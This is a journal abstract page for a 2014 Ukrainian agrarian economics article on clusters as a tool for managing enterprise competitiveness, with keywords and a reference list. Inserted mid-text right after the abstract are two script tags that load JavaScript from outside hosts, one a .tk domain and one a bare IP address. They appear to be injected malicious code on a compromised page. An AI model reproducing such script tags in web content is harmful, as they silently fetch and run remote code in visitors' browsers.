ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

UDS: [631.152:631.111.4]001.76
Аграрний менеджмент і підприємництво

Clusters as a form of enterprise's competitiveness management / Nesterenko S.A. // Ekonomika APK. - 2014. - № 1 - P. 52

Cluster approach in an enterprise's competitiveness management is especially essential for agroindustrial complex, which requires fast reformation. The conducted analysis of cluster approach in an enterprise's competitiveness management proves that creation of clusters is an effective form of an enterprise's competitiveness management directed at stable economic development of managing subjects. It is determined that participants can be united into clusters in different forms - from establishment of free partner relations based on a business trust between the enterprises; up to hard association by creating a legal entity: in the form of a company in which commercial non-state corporations are partners, and state enterprises can be depositors. Basic approaches towards cluster creation are suggested, they are essential for revival of domestic production, efficiency increase of regions innovative development, high level of economic development and competitiveness. Refs.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Key words: agrarian sector, cluster, cluster approach, competition, competitiveness, competition sphere, management of competitiveness

References

 1. Bilskyi V. H. Resursne zabezpechennia pidpryiemstv ahropromyslovoho kompleksu / Bilskyi V. H. // Formuvannia vyrobnychoho potentsialu ta rynku zasobiv vyrobnytstva / Za red. P. T. Sabluka, V. H. Bilskoho. – K.: Urozhai, 1993. – 259 s.
 2. Varnalii Z. S. Rehiony Ukrainy: problemy ta priorytety sotsialno-ekonomichnoho rozvytku: monohrafiia / Z. S. Varnaliia. – K.: Znannia Ukrainy, 2005. – 498 s.
 3. Voinarenko M. P. Mekhanizmy adaptatsii klasternykh modelei do polityko-ekonomichnykh realii Ukrainy // Svitovyi ta vitchyznianyi dosvid zaprovadzhennia novykh vyrobnychykh system (klasteriv) dlia zabezpechennia ekonomichnoho rozvytku terytorii / Materialy konferentsii 1-2 lyst. 2001r. – Kyiv: Spilka ekonomistiv Ukrainy, 2001. – S.25 −33.
 4. Heiets V. M. Rynkovi transformatsii v 1991-2000 r.: zdobutky, trudnoshchi, uroky / V. M. Heiets // Ukraina na porozi 21 stolittia: uroky reform ta stratehiia rozvytku: materialy nauk. konf. / NTUU KPI – K., 2001.– S. 29-41.
 5. Zakon Ukrainy "Pro priorytetni napriamy innovatsiinoi diialnosti v Ukraini" vid 16.03.2003r. #433-IV
 6. Kisil M. I. Investytsiina ta innovatsiina skladovi doktryny ahrarnoi polityky Ukrainy // Ekonomika APK. – 2003. –#7. – S. 82.
 7. Laiko P. A. Yakist silskohospodarskoi produktsii ta produktiv kharchuvannia yak vyrishalna skladova prodovolchoi bezpeky / P A. Laiko, M. F. Babiienko, Ye. A. Buzovskyi, T. D. Ishchenko // Ekonomika APK. – 2005. – # 1. – S. 12 - 21
 8. Melnyk A.F. Derzhavne upravlinnia [pidruch. za red. A.F.Melnyk] / A.F. Melnyk, O.Yu. Obolenskyi, A.Yu. Rasina. – K.: Znannia, 2009. – 582 s.
 9. Nesterenko S.A. Osnovni napriamy pidvyshchennia konkurentospromozhnosti pidpryiemstv / S. A. Nesterenko // Zbirnyk naukovykh prats Tavriiskoho derzhavnoho ahrotekhnolohichnoho universytetu. Seriia: Ekonomichni nauky. – Melitopol, 2012. – # 1 (17), T. 2. – S. 58– 64.
 10. Paskhaver B. Y. Dinamika fondovoi nayavnosti / B. Y. Paskhaver // Ekonomika Ukrainy. – 2002. – # 7. – S. 23 - 32.
 11. Porter M. Konkurentnaya stratehiya: Metodika analiza otraslei y konkurentov / Maikl Porter; Per. s angl. − 3-e yzd.  M.: Alpyna Byznes Buks, 2007. . 453 s.
 12. Porter M. Konkurentnoye preimushchestvo. Kak dostich vysokoho rezultata i obespechit eho ustoichivost / M. Porter. − M. : Alpyna Biznes Buks, 2006. − 715 s.
 13. Hammel G., Prahalad C.K. The Core Competence of the Corporation, Harvard Business Review, 71, May – June 1990, 71: P. 79 – 91.
 14. Commons J.R. Institutional Economics // American Economic Review/ – V.21. – 1931. – PP. 68-657. – Retrieved from: ttp:/www.socserv2.socsci.mcmaster.ca
 15. Edgeworth F.Y. Mathematical Psychics. Mountain Center, CA: James & Gordon, 1995. — 176 p.
 16. Enright M. The Geographical Scope of Competitive Advantage // Stuck in the Region? Changing scales for regional identity / Ed by E. Dirven, J. Grocnewegen and S. van Hoof. - Utrecht, 1993. - P. 87-102.
Read article: 14_01_52-56.pdf